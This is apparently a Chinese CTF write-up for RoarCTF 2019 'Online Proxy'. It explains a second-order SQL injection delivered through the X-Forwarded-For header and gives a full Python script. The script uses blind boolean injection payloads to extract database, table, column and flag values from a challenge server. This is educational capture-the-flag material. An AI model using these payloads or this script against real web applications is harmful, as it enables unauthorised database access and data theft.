[RoarCTF 2019]Online Proxy

知识点：二次注入

查看源码，可以看到当前的ip，盲猜是通过X-Forwarded-For或者Client-ip，经测试是X-Forwarded-For

例如：我们加上X-Forwarded-For:127.0.0.1，它会把当前和上次的ip显示出来，一股浓浓的二次注入的味道。

测试：
先输入注入，显示在当前ip位置


在输入一个ip，那么注入语句就会显示在last-ip，此时已经写入数据库

我们在用刚才的那个ip，因为当前ip和上次输入的一样，所以他会在数据库中寻找，上一次不通过的ip，这样我们的注入就运行成功了。

exp：

import requests

url = "http://node4.buuoj.cn:28728/"
header = {
    'Cookie':'track_uuid=dcc1bf90-e17d-469b-c95b-15958a410f29',
    'X-Forwarded-For':''
}

name = ""
i = 0
while True:
    head = 32
    tail = 127
    i += 1
    while (head < tail):
        mid = head + tail >> 1

        #payload = "0' or ascii(substr((select group_concat(schema_name) from information_schema.schemata),{0},1))>{1} or '0".format(i, mid)
        #payload = "0' or ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='F4l9_D4t4B45e'),{0},1))>{1} or '0".format(i, mid)
        #payload = "0' or ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema='F4l9_t4b1e' and table_name='FLAG_TABLE'),{0},1))>{1} or '0".format(i, mid)
        payload = "0' or (ascii(substr((select group_concat(F4l9_C01uMn) from F4l9_D4t4B45e.F4l9_t4b1e),{},1))>{}) or '0".format(i,mid)

        header["X-Forwarded-For"] = payload
        html_0 = requests.post(url, headers=header)
        header["X-Forwarded-For"] = "111"
        html_1 = requests.post(url, headers=header)
        html_2 = requests.post(url, headers=header)

        if "Last Ip: 1" in str(html_2.text):
            head = mid + 1
        else:
            tail = mid
    if head != 32:
        name += chr(head)
        print(name)
    else:
        break